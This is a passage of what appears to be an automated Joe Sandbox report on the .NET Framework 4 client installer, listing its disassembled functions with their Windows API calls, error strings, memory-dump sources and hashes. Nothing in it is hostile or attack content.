                                                                                                                                                                    • Opcode ID: 7d4aa318ebc9d187c9d224a5a210188db40d6566fcd04cfb40c8373edd2c1775
                                                                                                                                                                    • Instruction ID: afe31b83f5d30641070c2e42c42381622b22b0dd931af6f022c600bc4786004c
                                                                                                                                                                    • Opcode Fuzzy Hash: 7d4aa318ebc9d187c9d224a5a210188db40d6566fcd04cfb40c8373edd2c1775
                                                                                                                                                                    • Instruction Fuzzy Hash: 5F21E3B4905A08DFF756DF29FC896857BB8BB08309F50401AEB1987B60E7B85980CF12
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00018DAE Relevance: 4.6, APIs: 3, Instructions: 51windowCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • FormatMessageW.KERNEL32(000011FF,00000000,00000000,00000000,00000000,00000000,0000000C,00000000,00000000,?,?,?,00015D40,?,00000000,00000000), ref: 00018DE2
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00015D40,?,00000000,00000000,0000000C,00000000), ref: 00018DEF
                                                                                                                                                                    • LocalFree.KERNEL32(00000000,00000000,?,?,?,00015D40,?,00000000,00000000,0000000C,00000000), ref: 00018E27
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorFormatFreeLastLocalMessage
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1365068426-0
                                                                                                                                                                    • Opcode ID: d0c8a6dee4f1f36795578c20ac3c4be215cf545718a33f2f3be95e5ab3f239f0
                                                                                                                                                                    • Instruction ID: f8d3f92b605c3b387690cef577389b6e468d01701b928dc12ed68ea939300ebd
                                                                                                                                                                    • Opcode Fuzzy Hash: d0c8a6dee4f1f36795578c20ac3c4be215cf545718a33f2f3be95e5ab3f239f0
                                                                                                                                                                    • Instruction Fuzzy Hash: CF019276900118FBDF159F95DC088EEBBBAEF84710F158429F60293240DB748F91DBA0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 000297AE Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_00019767), ref: 000297B3
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3192549508-0
                                                                                                                                                                    • Opcode ID: e2cb61a611c042e428d766eac54e440b1998aa0622b2d8ade971b301cabe0f2a
                                                                                                                                                                    • Instruction ID: ddaab481e0e2933beb8680b48ddd61ce2790bb899e29b6ccd147a3f8f6cf624f
                                                                                                                                                                    • Opcode Fuzzy Hash: e2cb61a611c042e428d766eac54e440b1998aa0622b2d8ade971b301cabe0f2a
                                                                                                                                                                    • Instruction Fuzzy Hash: 499002B0E696105667041F706D0948565989B5C653F4144507701C8094DA6440805511
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00017016 Relevance: 59.8, APIs: 24, Strings: 10, Instructions: 271windowCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SendMessageW.USER32(00000000,0000000C,00000000,?), ref: 000171D4
                                                                                                                                                                    • SendMessageA.USER32(?,00000028,00000000,00000000), ref: 000171DF
                                                                                                                                                                    • GetDlgItem.USER32(?,000003F0), ref: 00017203
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00017210
                                                                                                                                                                    • GetDlgItem.USER32(?,000003F0), ref: 000172FD
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00017307
                                                                                                                                                                    • SendMessageW.USER32(00000000,0000000C,00000000,?), ref: 00017341
                                                                                                                                                                    • SetWindowLongW.USER32(?,000000EB,?), ref: 0001734D
                                                                                                                                                                      • Part of subcall function 000187EB: GetProcessHeap.KERNEL32(00000000,?,00000040,00000040,0001917A,00000000,0003BF10,?,?,00016C1A,0000000B,?,?,00016AF8,?), ref: 00018802
                                                                                                                                                                      • Part of subcall function 000187EB: HeapReAlloc.KERNEL32(00000000,?,00000040,00000040,0001917A,00000000,0003BF10,?,?,00016C1A,0000000B,?,?,00016AF8,?), ref: 00018809
                                                                                                                                                                    • EndDialog.USER32(00000001,80070642), ref: 0001738C
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to allocate memory for the directory control value, xrefs: 00017289
                                                                                                                                                                    • Call to the SHGetPathFromIDListW failed, xrefs: 00017184
                                                                                                                                                                    • Failed to get the label control, xrefs: 000170E2
                                                                                                                                                                    • Failed to get the directory control, xrefs: 000171BA, 00017231
                                                                                                                                                                    • Failed to get the text of the label, xrefs: 00017120
                                                                                                                                                                    • Failed to get text from the directory control, xrefs: 000172C6
                                                                                                                                                                    • Failed to get text length from the directory control, xrefs: 0001726D
                                                                                                                                                                    • Failed to allocate memory for the directory value, xrefs: 00017084
                                                                                                                                                                    • Failed to get the directory control., xrefs: 00017328
                                                                                                                                                                    • Failed to allocate memory for the title, xrefs: 000170A3
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: MessageSend$ErrorHeapItemLast$AllocDialogLongProcessWindow
                                                                                                                                                                    • String ID: Call to the SHGetPathFromIDListW failed$Failed to allocate memory for the directory control value$Failed to allocate memory for the directory value$Failed to allocate memory for the title$Failed to get text from the directory control$Failed to get text length from the directory control$Failed to get the directory control$Failed to get the directory control.$Failed to get the label control$Failed to get the text of the label
                                                                                                                                                                    • API String ID: 2993860606-745645607
                                                                                                                                                                    • Opcode ID: fad42c11825cd41ee1254ff240e059897994c9c16b0bfaf9401b0a4e92f16620
                                                                                                                                                                    • Instruction ID: d08c9280469395d9d2953a456b6b559ca9e81735ad8b9d940b4aed2a210ad85e
                                                                                                                                                                    • Opcode Fuzzy Hash: fad42c11825cd41ee1254ff240e059897994c9c16b0bfaf9401b0a4e92f16620
                                                                                                                                                                    • Instruction Fuzzy Hash: 7B91B476D48226BBDB215FA4CC48BDD7AB4AF04310F168234FE19FB291D6798EC09790
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0002A919 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,000290DE), ref: 0002A921
                                                                                                                                                                    • __mtterm.LIBCMT ref: 0002A92D
                                                                                                                                                                      • Part of subcall function 0002A5DA: _DecodePointerInternal@4.DOTNETFX40_CLIENT_SETUP(00000005,0002AA8F,?,000290DE), ref: 0002A5EB
                                                                                                                                                                      • Part of subcall function 0002A5DA: TlsFree.KERNEL32(0000000E,0002AA8F,?,000290DE), ref: 0002A605
                                                                                                                                                                      • Part of subcall function 0002A5DA: DeleteCriticalSection.KERNEL32(00000000,00000000,0001B4F9,?,0002AA8F,?,000290DE), ref: 0002D09B
                                                                                                                                                                      • Part of subcall function 0002A5DA: _free.LIBCMT ref: 0002D09E
                                                                                                                                                                      • Part of subcall function 0002A5DA: DeleteCriticalSection.KERNEL32(0000000E,0001B4F9,?,0002AA8F,?,000290DE), ref: 0002D0C5
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0002A943
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0002A950
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0002A95D
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 0002A96A
                                                                                                                                                                    • TlsAlloc.KERNEL32(?,000290DE), ref: 0002A9BA
                                                                                                                                                                    • TlsSetValue.KERNEL32(00000000,?,000290DE), ref: 0002A9D5
                                                                                                                                                                    • __init_pointers.LIBCMT ref: 0002A9DF
                                                                                                                                                                    • _EncodePointerInternal@4.DOTNETFX40_CLIENT_SETUP(?,000290DE), ref: 0002A9F0
                                                                                                                                                                    • _EncodePointerInternal@4.DOTNETFX40_CLIENT_SETUP(?,000290DE), ref: 0002A9FD
                                                                                                                                                                    • _EncodePointerInternal@4.DOTNETFX40_CLIENT_SETUP(?,000290DE), ref: 0002AA0A
                                                                                                                                                                    • _EncodePointerInternal@4.DOTNETFX40_CLIENT_SETUP(?,000290DE), ref: 0002AA17
                                                                                                                                                                    • _DecodePointerInternal@4.DOTNETFX40_CLIENT_SETUP(Function_0001A772,?,000290DE), ref: 0002AA38
                                                                                                                                                                    • __calloc_crt.LIBCMT ref: 0002AA4D
                                                                                                                                                                    • _DecodePointerInternal@4.DOTNETFX40_CLIENT_SETUP(00000000,?,000290DE), ref: 0002AA67
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0002AA79
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Internal@4Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                                                                                                                                                                    • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                                                                    • API String ID: 1131704290-3819984048
                                                                                                                                                                    • Opcode ID: bb32cd13cb8fb48dc573557fceaef0f7303f3a551494ff404dd8b4b5680bb4a7
                                                                                                                                                                    • Instruction ID: 73e5b72bafe44223f148c89261c91def19ccf879b7e16db48245a1698669c800
                                                                                                                                                                    • Opcode Fuzzy Hash: bb32cd13cb8fb48dc573557fceaef0f7303f3a551494ff404dd8b4b5680bb4a7
                                                                                                                                                                    • Instruction Fuzzy Hash: F0316031A012219FF7A6AF75BC4979A3FA9EB46368701551FE718C22B0DB7C8441CF52
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00016C5C Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 242stringCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetCommandLineW.KERNEL32(?,00000000,X?f), ref: 00016C76
                                                                                                                                                                    • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 00016C84
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00016C91
                                                                                                                                                                    • lstrlenW.KERNEL32(00000001), ref: 00016CF6
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000001,-00000002,00000002,00013E10,000000FF), ref: 00016D13
                                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 00016D40
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000001,-00000002,00000002,00013E34,000000FF), ref: 00016D5D
                                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 00016D90
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000001,-00000002,00000002,00013E64,000000FF), ref: 00016DAD
                                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 00016DDD
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000001,-00000002,00000001,00013E6C,000000FF), ref: 00016DF9
                                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 00016EE1
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to allocate log, xrefs: 00016DD1
                                                                                                                                                                    • Failed to get path to executable., xrefs: 00016E85
                                                                                                                                                                    • Failed to get command line., xrefs: 00016CB2
                                                                                                                                                                    • Failed to allocate box path, xrefs: 00016D34
                                                                                                                                                                    • Failed to allocate extract directory, xrefs: 00016D84
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CompareStringlstrlen$CommandLine$ArgvErrorFreeLastLocal
                                                                                                                                                                    • String ID: Failed to allocate box path$Failed to allocate extract directory$Failed to allocate log$Failed to get command line.$Failed to get path to executable.
                                                                                                                                                                    • API String ID: 881607980-1268566871
                                                                                                                                                                    • Opcode ID: 4aec9cf5b051f5a71bdb6f3d7f7e60423f8df49d3a9fd0fd88ca6acaed5eb51d
                                                                                                                                                                    • Instruction ID: 4c5ea49e08e81413a31a17766afa16e56f00fce60be8997bc504408886e88e52
                                                                                                                                                                    • Opcode Fuzzy Hash: 4aec9cf5b051f5a71bdb6f3d7f7e60423f8df49d3a9fd0fd88ca6acaed5eb51d
                                                                                                                                                                    • Instruction Fuzzy Hash: FC71D079E04215ABDB249F58CC86AFA76E5EB14320F218619F941EB2C0C636DDC1CB90
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00017EE0 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 134memoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 000187EB: GetProcessHeap.KERNEL32(00000000,?,00000040,00000040,0001917A,00000000,0003BF10,?,?,00016C1A,0000000B,?,?,00016AF8,?), ref: 00018802
                                                                                                                                                                      • Part of subcall function 000187EB: HeapReAlloc.KERNEL32(00000000,?,00000040,00000040,0001917A,00000000,0003BF10,?,?,00016C1A,0000000B,?,?,00016AF8,?), ref: 00018809
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,01000191,?,0100002D,?,00000000,00000000,00000000,?,?,?,?,00017DDD,00000000), ref: 00018016
                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,00017DDD,00000000,00000000,?,?,?,00017780,?,00000000,00000000,X?f), ref: 00018019
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,01000191,?,0100002D,?,00000000,00000000,00000000), ref: 0001802F
                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00018032
                                                                                                                                                                    Strings
                                                                                                                                                                    • Ignoring cluster resource as it's not a Physical Disk, xrefs: 00017F5D
                                                                                                                                                                    • Cluster resource type: '%S', xrefs: 00017F3E
                                                                                                                                                                    • Found a partition on cluster resource: '%S', xrefs: 00017FA7
                                                                                                                                                                    • Failed to allocate an empty drive map, xrefs: 00017F0A
                                                                                                                                                                    • Physical Disk, xrefs: 00017F49
                                                                                                                                                                    • Failed to get the cluster property CLUSCTL_RESOURCE_STORAGE_GET_DISK_INFO, xrefs: 00017F87
                                                                                                                                                                    • Ignoring the partition '%S' because it doesn't look like a DOS name, xrefs: 00017FBD
                                                                                                                                                                    • Failed to get the cluster property CLUSCTL_RESOURCE_GET_RESOURCE_TYPE, xrefs: 00017F34
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$Process$Free$Alloc
                                                                                                                                                                    • String ID: Cluster resource type: '%S'$Failed to allocate an empty drive map$Failed to get the cluster property CLUSCTL_RESOURCE_GET_RESOURCE_TYPE$Failed to get the cluster property CLUSCTL_RESOURCE_STORAGE_GET_DISK_INFO$Found a partition on cluster resource: '%S'$Ignoring cluster resource as it's not a Physical Disk$Ignoring the partition '%S' because it doesn't look like a DOS name$Physical Disk
                                                                                                                                                                    • API String ID: 3689955550-1827234441
                                                                                                                                                                    • Opcode ID: 78508911362f748ba304b34272ddb7848b29cc43c67f493e9c3d00d7b7475a5a
                                                                                                                                                                    • Instruction ID: e2f78c68b1f05904c57c76617bfe3c1a1e96991ca02674e6a825ae3068271ef9
                                                                                                                                                                    • Opcode Fuzzy Hash: 78508911362f748ba304b34272ddb7848b29cc43c67f493e9c3d00d7b7475a5a
                                                                                                                                                                    • Instruction Fuzzy Hash: 1441AF71D48209FBDB61EBA08C46EEFBBF9EF44340F11842AF509A6152DB705AC6CB50
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0001ADE5 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 188fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 000184C7: GetLocalTime.KERNEL32(?,?,00000000), ref: 000184E2
                                                                                                                                                                      • Part of subcall function 000184C7: swprintf.LIBCMT ref: 00018513
                                                                                                                                                                    • GetLastError.KERNEL32(?,40000000,00000005,00000002,08000080,?,00000000,?,?,00000000,000000FF), ref: 0001AEA7
                                                                                                                                                                    • SetEndOfFile.KERNEL32(?,00000000,?,?,?,40000000,00000005,00000002,08000080,?,00000000,?,?,00000000,000000FF), ref: 0001AEED
                                                                                                                                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 0001AF04
                                                                                                                                                                    • ReadFile.KERNEL32(?,?,?,?,00000000,?,?,?), ref: 0001AF7C
                                                                                                                                                                    • CloseHandle.KERNEL32(?,00000000,?,?,?,40000000,00000005,00000002,08000080,?,00000000,?,?,00000000,000000FF), ref: 0001B02C
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0001B057
                                                                                                                                                                      • Part of subcall function 00019B6A: SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0001A52C,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00019B82
                                                                                                                                                                      • Part of subcall function 00019B6A: GetLastError.KERNEL32(?,?,?,0001A52C,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00015AF6,X?f), ref: 00019B8C
                                                                                                                                                                    Strings
                                                                                                                                                                    • User canceled extraction..., xrefs: 0001B019
                                                                                                                                                                    • Extracting file: %ws, xrefs: 0001AE06
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$ErrorLast$Pointer$CloseHandleLocalReadTimeswprintf
                                                                                                                                                                    • String ID: Extracting file: %ws$User canceled extraction...
                                                                                                                                                                    • API String ID: 1889754113-1866894759
                                                                                                                                                                    • Opcode ID: 2ce8706aa77b20403842482b859e0de30b89d07b30290f6724b4587bcc054c1a
                                                                                                                                                                    • Instruction ID: 190666b350d60ec78f4a1096651d69646a2d966768f8d84b04727a2d340f5849
                                                                                                                                                                    • Opcode Fuzzy Hash: 2ce8706aa77b20403842482b859e0de30b89d07b30290f6724b4587bcc054c1a
                                                                                                                                                                    • Instruction Fuzzy Hash: FC615170A002189FDB329BA4CCC9FEAB6F5EF4D700F1445A9F29996152D7B2DAC49F10
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 000188ED Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 89memoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,6CEC4150,00000024,?,00000000,00000000), ref: 00018930
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,0001A366,?,?,?), ref: 00018957
                                                                                                                                                                    • HeapReAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0001A366,?,?,?,00000000,000000FF), ref: 0001895E
                                                                                                                                                                      • Part of subcall function 00019A43: GetProcessHeap.KERNEL32(00000000,?,?,00018CCC,?,?,00000000), ref: 00019A4D
                                                                                                                                                                      • Part of subcall function 00019A43: HeapSize.KERNEL32(00000000,?,00018CCC,?,?,00000000), ref: 00019A54
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,?,?,?,?,?,0001A366,?,?,?,00000000), ref: 00018968
                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0001A366,?,?,?,00000000,000000FF), ref: 0001896F
                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,?,00000000,00000000,00000000), ref: 00018992
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0001A366,?,?,?,00000000,000000FF), ref: 00018998
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$Process$AllocByteCharMultiWide$ErrorLastSize
                                                                                                                                                                    • String ID: W
                                                                                                                                                                    • API String ID: 3423999398-655174618
                                                                                                                                                                    • Opcode ID: e7321d49963844237dff329e415e2dc432341eec02f9e740a7a75f13688137ea
                                                                                                                                                                    • Instruction ID: c11e58b69309a62ef712ab15992b487c037f47b3be2c4acf1ec59c567629d4cd
                                                                                                                                                                    • Opcode Fuzzy Hash: e7321d49963844237dff329e415e2dc432341eec02f9e740a7a75f13688137ea
                                                                                                                                                                    • Instruction Fuzzy Hash: C4214BB1900149FFDB109FA49C849FDBAB8EF05364F38CA69F251E7290DA358F809B51
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00018254 Relevance: 10.6, APIs: 4, Strings: 3, Instructions: 95memoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000000,00000000,?,?,?,00017F2D,?,0100002D,?,00000000,00000000,00000000), ref: 000182AB
                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,00017F2D,?,0100002D,?,00000000,00000000,00000000,?,?,?,?,00017DDD), ref: 000182B2
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,00017F2D,?,0100002D,?,00000000,00000000,00000000), ref: 0001831C
                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,?,?,00017F2D,?,0100002D,?,00000000,00000000,00000000,?,?,?,?,00017DDD), ref: 00018323
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to allocate memory for the cluster resource property buffer, xrefs: 000182C3
                                                                                                                                                                    • Failed to retrieve the the cluster resource property value, xrefs: 00018300
                                                                                                                                                                    • Failed to retrieve the size from the cluster resource property buffer, xrefs: 00018293
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$Process$AllocFree
                                                                                                                                                                    • String ID: Failed to allocate memory for the cluster resource property buffer$Failed to retrieve the size from the cluster resource property buffer$Failed to retrieve the the cluster resource property value
                                                                                                                                                                    • API String ID: 756756679-2748719997
                                                                                                                                                                    • Opcode ID: e7443f604918be9ce172fad79b4f2d8c23543c96c6dd21b3ad97b61ac9784b7a
